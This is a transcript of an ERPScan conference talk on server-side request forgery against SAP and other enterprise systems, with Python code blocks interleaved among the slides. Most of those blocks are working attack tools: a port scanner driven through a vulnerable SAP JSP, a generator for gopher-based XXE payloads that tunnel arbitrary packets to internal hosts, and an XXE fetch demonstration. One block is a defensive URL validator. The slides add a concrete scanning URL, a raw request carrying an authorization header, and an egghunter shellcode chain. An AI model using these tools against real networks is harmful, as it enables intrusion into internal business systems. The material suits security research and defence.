Invest in security to secure investments. SSRF vs. business-critical applications, part 2: new vectors and connect-back attacks. Alexander Polyakov, CTO at ERPScan

Post on 17-Apr-2018


TRANSCRIPT

  • Invest in security to secure investments

    SSRF VS. BUSINESS-CRITICAL APPLICATIONS. PART 2: NEW VECTORS AND CONNECT-BACK ATTACKS

    Alexander Polyakov CTO at ERPScan

  • Alexander Polyakov

    Business application security expert

  • ERPScan

    Leading SAP AG partner in discovering security vulnerabilities, by number of vulnerabilities found

    Developers of ERPScan Security Scanner for SAP

    Leader by the number of acknowledgements from SAP (>60)

    Invited to talk at more than 30 key security conferences worldwide (BlackHat US/EU/DC/UAE, RSA, Defcon, HITB)

    First to release software for NetWeaver J2EE platform assessment

    Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices and critical infrastructure, accumulating their knowledge in SAP research.

    Conducted workshops for SAP

  • Agenda

    Enterprise applications

    SSRF: history, types

    SSRF proxy attacks: example of attacking SAP with SSRF

    SSRF connect-back attacks: examples

    XXE Scanner

    Conclusion

  • Enterprise applications: Definitions

    Business software is generally any software that helps a business to increase its efficiency or measure its performance

    Small (MS Office)

    Medium (CRM, Shops)

    Enterprise (ERP, BW)

  • Why are they critical?

    Any information an attacker might want, whether a cybercriminal, industrial spy or competitor, is stored in the corporate ERP: financial data, customer and public relations data, intellectual property, personally identifiable information and more. Industrial espionage, sabotage, fraud or insider embezzlement can be very effective when targeted at the victim's ERP system, and they can cause significant damage to the business.

  • Business-critical systems architecture

    Located in a secure subnetwork

    Secured by firewalls

    Monitored by IDS systems

    Regularly patched

  • Noahhh

  • But let's assume that they are, because it will be much more interesting to attack them

  • Secure corporate network

    (Diagram: the Internet, the industrial network, the ERP network and the corporate network drawn as separate, isolated segments)

  • But wait. There must be some links!

  • Real corporate network

    (Diagram: the same four segments, the Internet, industrial network, ERP network and corporate network, now with links between them)

  • And attackers can use them!

  • Corporate network attack scenario

    (Diagram: the same segments, with an attack path following those links from the Internet through the corporate network into the ERP and industrial networks)

  • But how?

  • SSRF History: the beginning

    SSRF: Server Side Request Forgery.

    An attack class first discussed in 2008, with very little published about its theory or practical examples at the time.

    Like any new term, SSRF doesn't describe something completely new, such as a new type of vulnerability: SSRF-style attacks were known before.

  • SSRF History: Basics

    We send Packet A to Service A

    Service A initiates Packet B to service B

    Services can be on the same host or on different hosts

    We can manipulate some fields of packet B within packet A

    Various SSRF attacks depend on how many fields we can control in packet B

    (Diagram: Packet A from the attacker to Service A; Packet B from Service A to Service B)

  • SSRF history

    Deral Heiland, Shmoocon 2008: Web Portals: Gateway To Information Or A Hole In Our Perimeter Defenses
    http://www.layereddefense.com/media/dhsmhoo08.ppt

    SpiderLabs 2012: Too XXE For My Shirt
    http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html

    Vorontsov 2012: SSRF via XXE
    http://2012.caro.org/presentations/attacks-on-large-modern-web-applications

    ERPScan (Polyakov, Chastuchin), August 2012: SSRF vs business-critical applications (Gopher protocol)
    http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf

    ssrfsocks by iamultra, August 2012: a tool for ERPScan's Gopher vulnerability
    https://github.com/iamultra/ssrfsocks

    Less Known Web App Vulnerabilities: Real World Examples (from the ERPScan paper), October 2012

    ERPScan, October 2012: Gopher SSRF in JVM advisory
    http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/

    ERPScan (Polyakov): SSRF 2.0
    http://erpscan.com/category/publications/

    New research will be published at ZeroNights
    http://2012.zeronights.org/


  • Ideal SSRF

    The idea is to find interfaces on the victim server that let us send packets, initiated by the victim server, to the localhost interface of the victim server or to another server that a firewall shields from the outside. Ideally, such an interface:

    Must allow sending any packet to any host and any port

    Must be accessed remotely without authentication

  • Why?

    In this research, we wanted to :

    Collect the information about SSRF attacks

    Categorize them

    Show examples of SSRF attacks

    Show new potential and real SSRF vectors

  • SSRF

    SSRF
      SSRF proxy attack
        Trusted SSRF
        Remote SSRF
          Simple
          Partial
          Full
        Local SSRF
      SSRF back connect
      SSRF counter attack

  • SSRF proxy attack

    (Diagram: Packet A from the attacker in the corporate network to Server A; Server A forwards Packet B into the secure network)

  • SSRF back connect attack

    (Diagram: Packet A reaches Server A; Server A sends Packet B out to the attacker's host, whose reply, Packet C, targets the client application on Server A)

  • SSRF proxy attacks

    Trusted SSRF (can forge requests to remote services, but only to predefined ones)

    Remote SSRF (can forge requests to any remote IP and port)

    Simple remote SSRF (no control at the application level)

    Partial remote SSRF (control over some fields at the application level)

    Full remote SSRF (full control at the application level)

  • Exploiting SSRF

    For every SSRF attack, at least two vulnerabilities must combine to make the attack work:

    First vulnerability
      Functionality to create/use links (for trusted SSRF)
      Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)

    Second vulnerability
      Insecure link (for trusted SSRF)
      Vulnerability in a service on Server B (for remote SSRF)
      Vulnerability in a localhost service on Server A (for local SSRF)
      Vulnerability in a client application on Server A (for back-connect SSRF)
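    The first vulnerability is the one Server A's own code can close: the destination of Packet B must not be whatever the client wrote into Packet A. The following Python is an added example, not code from the deck or from any SAP component. The allowed host names and the policy (HTTP(S) only, standard ports, and no non-global address once the name is resolved) are assumptions made for the example; the offline checks pass a fake resolver instead of querying DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed policy for this example: Server A only ever needs to reach these
# partners over HTTP(S) on the standard ports.
ALLOWED_HOSTS = {"partner.example.com", "feeds.example.net"}
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def vulnerable_target(url):
    """The functionality the deck calls the first vulnerability: whatever the
    client put in Packet A becomes the destination of Packet B, unchecked."""
    parts = urlsplit(url)
    return parts.scheme, parts.hostname, parts.port or 80


def resolve_all(host):
    """Every address the name currently resolves to (real DNS; the checks
    below pass a fake resolver so the example runs offline)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_internal(ip_text):
    """Loopback, RFC 1918, link-local, shared address space, reserved:
    anything the ipaddress module does not consider globally routable."""
    return not ipaddress.ip_address(ip_text).is_global


def hardened_target(url, resolver=resolve_all):
    """Return (scheme, host, port, ip) for a request Server A may make, or
    raise ValueError. Scheme, host allow-list, port and the *resolved*
    address are all checked, so a partner name that suddenly resolves to
    127.0.0.1 or 172.16.0.13 is refused as well."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("scheme not allowed: %r" % parts.scheme)
    if parts.username or parts.password:
        raise ValueError("credentials in URL")
    host = parts.hostname
    if host is None or host.lower() not in ALLOWED_HOSTS:
        raise ValueError("host not allowed: %r" % host)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        raise ValueError("port not allowed: %d" % port)
    addrs = resolver(host)
    if not addrs:
        raise ValueError("host does not resolve: %r" % host)
    for addr in addrs:
        if is_internal(addr):
            raise ValueError("%s resolves to internal address %s" % (host, addr))
    # Return the checked address so the caller connects to *it* (sending the
    # name in the Host header) instead of resolving the name a second time.
    return parts.scheme, host, port, min(addrs)


def rejects(url, resolver=resolve_all):
    """True if hardened_target refuses url (helper for the checks)."""
    try:
        hardened_target(url, resolver)
    except ValueError:
        return True
    return False
```

    The returned address is what the HTTP client should connect to; resolving the name again at connect time reopens the DNS-rebinding gap the check just closed.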

  • Trusted SSRF

    Trusted SSRF in Oracle

    SELECT * FROM myTable@HostB

    EXECUTE Schema.Package.Procedure@HostB('Parameter')

    Trusted SSRF in MSSQL

    SELECT * FROM OPENQUERY(HostB, 'SELECT @@version')

    Trusted SSRF in SAP NetWeaver

    SM59 transaction

    Also Lotus Domino and others

    Not so interesting

  • First vulnerability (functionality on Server A)

    Unusual calls

    Multiprotocol calls (URI)
      In engines (XML)
      In applications

    UNC calls

    HTTP calls

    FTP calls

    LDAP calls

    SSH calls

    Other calls

  • Functionality on server A: Unusual calls

    Remote port scan

    SAP NetWeaver wsnavigator (sapnote 1394544,871394)

    SAP NetWeaver ipcpricing (sapnote 1545883)

    SAP BusinessObjects viewrpt (sapnote 1583610)

    Remote password bruteforce

    SAP NetWeaver (NDA)

    Other

    Information disclosure by testing if a file or a directory exists

    Timing attacks

    Etc.

    Very application-specific, and can be very interesting

  • Example of unusual calls

    It is possible to scan internal network from the Internet

    Authentication is not required

    SAP NetWeaver J2EE engine is vulnerable

    /ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13&port=31337&dispatcher=&targetClient=&view=

  • Port scan via ipcpricing JSP

    (Screenshots: the JSP's response differs for each outcome: host is not alive, port closed, HTTP port, SAP port)
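    An added example (not the deck's scanner) of turning such an endpoint into a port scanner when the response for each outcome is not known in advance: probe one address known to be unassigned and one port known to be closed on a live host, then label every other target by whether its response signature matches one of those two. The endpoint path and parameter names are taken from the slide; the base URL, the calibration targets and the simulated responses in fake_fetch are constructed assumptions, and http_probe is the real client that is not exercised offline.

```python
import hashlib
import re
import time
import urllib.error
import urllib.request
from urllib.parse import urlencode

# Endpoint and parameter names from the slide; the base URL is an assumption.
SCAN_PATH = "/ipcpricing/ui/BufferOverview.jsp"


def scan_url(base, host, port):
    params = {"server": host, "port": port, "dispatcher": "",
              "targetClient": "", "view": ""}
    return base + SCAN_PATH + "?" + urlencode(params)


def http_probe(base, timeout=10):
    """Real probe against Server A: returns fetch(host, port) -> (status, body,
    seconds). Not exercised here; fake_fetch below stands in for it."""
    def fetch(host, port):
        start = time.monotonic()
        try:
            with urllib.request.urlopen(scan_url(base, host, port), timeout=timeout) as r:
                status, body = r.status, r.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:
            status, body = e.code, e.read().decode("utf-8", "replace")
        return status, body, time.monotonic() - start
    return fetch


def signature(status, body, elapsed, slow=2.0):
    """Collapse a response to something comparable across targets: status,
    fast/slow, and a hash of the body with IPs and numbers blanked so that an
    echoed target address does not make every response unique."""
    body = re.sub(r"\d{1,3}(?:\.\d{1,3}){3}", "<ip>", body)
    body = re.sub(r"\d+", "<n>", body)
    digest = hashlib.sha256(body.encode("utf-8")).hexdigest()[:12]
    return status, ("slow" if elapsed >= slow else "fast"), digest


def classify(fetch, targets, dead_host, closed):
    """Calibrate on one address known to be unassigned and one (host, port)
    known to be alive but closed; anything whose signature matches neither
    answered, i.e. the port is open and speaks *something*."""
    dead_sig = signature(*fetch(dead_host, 80))
    closed_sig = signature(*fetch(*closed))
    verdicts = {}
    for host, port in targets:
        sig = signature(*fetch(host, port))
        if sig == dead_sig:
            verdicts[(host, port)] = "host down or filtered"
        elif sig == closed_sig:
            verdicts[(host, port)] = "closed"
        else:
            verdicts[(host, port)] = "open:" + sig[2]   # one cluster per service type
    return verdicts


# Constructed simulation of the JSP's behaviour. The error strings and timings
# are invented for the example; the point is only that the outcomes differ,
# which is what the slide's screenshots show.
FAKE_ALIVE = {"172.16.0.1", "172.16.0.13"}
FAKE_OPEN = {
    ("172.16.0.13", 8000): "<html>Unexpected reply from 172.16.0.13:8000: HTTP/1.1 400 Bad Request</html>",
    ("172.16.0.13", 3200): "<html>Buffer overview for 172.16.0.13:3200 ...</html>",
}


def fake_fetch(host, port):
    if host not in FAKE_ALIVE:
        return 500, "java.net.ConnectException: connect to %s:%d timed out" % (host, port), 3.0
    if (host, port) not in FAKE_OPEN:
        return 500, "java.net.ConnectException: connection refused by %s:%d" % (host, port), 0.02
    return 200, FAKE_OPEN[(host, port)], 0.05
```

    Each distinct "open:" cluster corresponds to one kind of listener (in the slide's terms, the HTTP-port and SAP-port responses); looking at one raw response per cluster is enough to name them, and the timing bucket keeps a filtered host from being mistaken for a closed port.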

  • Multiprotocol calls (in XML)

    XML seems to be the new TCP.

    Almost all big projects use XML-based data transfer.

    There are a lot of XML-based protocols with different options to call external resources and thus conduct SSRF attacks.

    There is at least one element type which fits almost all XML-based schemas: xsd:anyURI.

    URIs also encompass URLs of other schemes (e.g., FTP, gopher, telnet), as well as URNs.

    Popular URI schemes: http://, ftp://, telnet://, ...
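    What such a URI turns into at the engine level, as an added example that is neither the deck's code nor an SAP engine: Python's stdlib SAX parser, whose default entity resolver hands every SYSTEM identifier to urllib's urlopen, so an external entity is Packet B. The internal URL, the "internal service" table and its response are constructed for the example; the resolver answers from that table so nothing leaves the process, but the recorded URI is exactly the request the engine would have sent.

```python
import io
import xml.sax
from xml.sax import handler, xmlreader

# Constructed stand-in for Server B: what the internal service would answer.
# A real engine reaches it with urllib.request.urlopen(); this table keeps
# the example offline.
INTERNAL_SERVICES = {
    "http://172.16.0.1:8000/sap/bc/ping": "<status>SAP NetWeaver alive</status>",
}

# Packet A's body: the external entity is the multiprotocol call.
XXE_DOC = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY probe SYSTEM "http://172.16.0.1:8000/sap/bc/ping">
]>
<data>&probe;</data>"""


class RecordingResolver(handler.EntityResolver):
    """Records every system identifier the parser wants to fetch.

    xml.sax's default resolver returns the identifier unchanged and the
    reader then opens it with urlopen(): that call is Packet B. Here the
    answer comes from INTERNAL_SERVICES instead.
    """

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource(systemId)
        src.setCharacterStream(io.StringIO(INTERNAL_SERVICES.get(systemId, "")))
        return src


class TextCollector(handler.ContentHandler):
    """Collects character data, i.e. whatever the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_with_engine(doc, external_entities):
    """Parse doc; return (text of the document, URIs the engine requested)."""
    parser = xml.sax.make_parser()
    # This single feature is the whole difference between the two engines.
    parser.setFeature(handler.feature_external_ges, external_entities)
    resolver, collector = RecordingResolver(), TextCollector()
    parser.setEntityResolver(resolver)
    parser.setContentHandler(collector)
    parser.parse(io.StringIO(doc))
    return "".join(collector.parts), resolver.requested


def vulnerable_engine(doc):
    """External general entities on: the parser fetches the SYSTEM URI and
    splices the response into the document."""
    return parse_with_engine(doc, external_entities=True)


def hardened_engine(doc):
    """External general entities off (the stdlib default since Python 3.7.1):
    the entity expands to nothing and no request is made."""
    return parse_with_engine(doc, external_entities=False)
```

    Note that the vulnerable engine does not merely send the request: Server B's reply becomes part of the parsed document, which is what makes this a read primitive and not only a blind one.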

  • Multiprotocol calls in XML

    XML: XML External Entity, XSD definition
    XML Encryption
    XML Signature
    WS-Policy
    WS-Security
    WS-Addressing
    XBRL
    ODATA (edmx), ODATA External Entity
    Other: BPEL, STRATML

  • XML Encryption

    1.

    2.

    3.

    4.

    Successfully Tested

  • XML Signature

    1.

    Successfully Tested

  • WS-Addressing

    1. http://ServerB/

    2. http://ServerB/

    Successfully Tested (0-day)

  • WS-Policy

    1.

    Not Tested

  • WS-Security

    1.

  • WS-Federation

    1.

    2. http://ServerB/

    3. http://ServerB/

    4. http://ServerB/

    Not Tested

  • XBRL

    1.

    2.

    Not Tested

  • ODATA (edmx)

    The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.

    http://www.odata.org/media/30002/OData%20CSDL%20Definition.html

    No examples of edmx in the wild (new protocol)


  • ODATA

    1.

    2.

    Still no products for testing (0-day)

  • STRATML

    1. http://ServerB/

    Not tested

  • SOAP

    SoapAction?

    No Examples

  • Multiprotocol Calls in Applications

  • Multiprotocol calls

    Not so usual but a potentially big area

    Oracle Database

    UTL_TCP

  • UNC calls: threats

    If the engine understands universal URIs, you can of course call a UNC path directly

    If there is no universal engine, search for functionality that takes a UNC path

    UNC calls can be used for:

    conducting an SMBRelay attack

    reading files from shared folders (open or trusted)

    other vectors which will be discussed later

    Check the SMBRelay Bible posts at http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0


  • UNC calls: applications

    SAP NetWeaver

    From SAP webservices (sapnote 1503579,1498575)

    From RFC functions (sapnote 1554030)

    From SAP transactions, reports (sapnote 1583286)

    Oracle Database

    Listener

    Database commands such as ctxsys.context

    MsSQL Database

    MySQL Database

    FTP servers

    IBM Lotus Domino controller

    VMWare

    Anything that uses XML engine

    And much more

  • HTTP calls: threats

    If the engine understands universal URIs, you can of course call an HTTP URL directly

    If there is no universal engine, search for functionality that makes HTTP calls

    HTTP calls can be used to conduct a wide range of attacks on systems that share a network with Server A:

    DoS

    Inf disclosure

    Unauthorized access (like invoker servlets)

    Bruteforcing (users/directories/pages)

    Fingerprinting

    etc

    Examples of HTTP attacks are beyond the current research

  • HTTP calls: applications

    SAP NetWeaver

    Transactions

    Reports

    RFC commands

    Portal portlets

    Portal links

    Oracle Database

    UTL_HTTP

    MsSQL Database

    PostgreSQL Database

    Anything that uses XML engine

    And much more

  • FTP calls: threats

    If the engine understands universal URIs, you can of course call an FTP URL directly

    FTP is usually possible whenever HTTP is possible

    If there is no universal engine, search for functionality that makes FTP calls

    FTP calls can be used to conduct a wide range of attacks on systems that share a network with Server A:

    DoS

    Inf disclosure

    Unauthorized access (like invoker servlets)

    Bruteforcing (users/directories/pages)

    Fingerprinting

    etc.

    Examples of FTP attacks are beyond the current research

  • FTP calls: applications

    SAP NetWeaver

    Transactions

    Reports

    RFC commands

    Oracle Database

    UTL_HTTP

    PostgreSQL Database

    Anything that uses XML engine

    And much more

  • Other calls

    ldap://    bruteforce logins; information disclosure

    jar://     information disclosure

    mailto:

    ssh2://    bruteforce logins; RCE?

    gopher://  XXE tunneling

    ...

    Just the most popular ones

  • Exploiting Gopher (Example)

  • XXE Tunneling (Example)

    (Diagram: Server A, a Portal or XI system at 192.168.0.1; Server B, an ERP, HR or BW system at 172.16.0.1, behind Server A)

    Packet A, sent to Server A:

    POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1
    Host: 192.168.0.1:8000
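    How the gopher:// scheme lets an external entity carry an arbitrary TCP payload such as Packet B, as an added example (not the deck's tooling; that is ssrfsocks and the PDF cited on the history slide). Assumptions: the HTTP request used as Packet B is a minimal stand-in for the deck's RFC SOAP call, Server B is 172.16.0.1:8000, and the XML engine on Server A has a gopher handler, which is what the deck's JVM advisory is about. wire_bytes models what a gopher client puts on the socket so the tunnel can be checked without a network.

```python
from urllib.parse import quote, unquote_to_bytes, urlsplit

# Packet B as it should arrive at Server B. Constructed for this example: a
# minimal HTTP request standing in for the deck's RFC SOAP call.
PACKET_B = (
    b"POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1\r\n"
    b"Host: 172.16.0.1:8000\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def gopher_url(host, port, payload):
    """Wrap raw bytes in a gopher URL (RFC 4266: host:port, then a
    one-character item type, then the selector). A gopher client connects and
    writes the selector verbatim followed by CRLF, so the selector *is* the
    TCP payload. '_' is the conventional dummy item type; safe='' percent-
    encodes every byte that could be misread as URL syntax (CR, LF, '/', '?')."""
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def wire_bytes(url):
    """(host, port, bytes) a gopher client would put on the socket for url."""
    parts = urlsplit(url)
    if parts.scheme != "gopher":
        raise ValueError("not a gopher URL: %r" % url)
    selector = parts.path[2:]            # drop the leading '/' and the type char
    return parts.hostname, parts.port or 70, unquote_to_bytes(selector) + b"\r\n"


def xxe_document(url):
    """Packet A's body: an XML document whose external entity points at the
    gopher URL, so that the XML engine on Server A opens the TCP connection
    and sends Packet B. The percent-encoded URL contains no '&', '<' or '"',
    so it needs no XML escaping inside the SYSTEM literal."""
    return ('<?xml version="1.0"?>\n'
            '<!DOCTYPE x [ <!ENTITY tunnel SYSTEM "%s"> ]>\n'
            '<x>&tunnel;</x>' % url)
```

    The CRLF the client appends lands after the HTTP body, where an HTTP server ignores it. Server B's answer goes back to Server A, not to the attacker, so on its own this is a blind write; reading the reply needs an engine that reflects the expanded entity, as in the HTTP case.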

  • XXE Tunneling to Buffer Overflow (Example)

    A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330)

    Hard to exploit because it requires calling an RFC function which calls Kernel function

    But even such a complex attack can be exploited

    Get ready for the hardcore

  • XXE Tunneling to Buffer Overflow (Hint 1)

    Shellcode size is limited to 255 bytes (the name parameter)

    The vulnerable system has no direct connection to the Internet, so we want DNS-tunneling shellcode to connect back, and that does not fit in 255 bytes

    But the XML engine keeps some of the XML data in RWX memory

    So we can use an egghunter: the small payload in the name parameter finds the real shellcode in that XML data

    This way any shellcode can be uploaded

  • XXE Tunneling to Buffer Overflow: Packet B

    POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1
    Authorization: Basic U1FQKjowMjA3NTk3==
    Host: company.com:80
    User-Agent: ERPSCAN Pentesting tool v 0.2
    Content-Type: text/xml; charset=utf-8
    Cookie: sap-client=000
    Content-Length: 2271
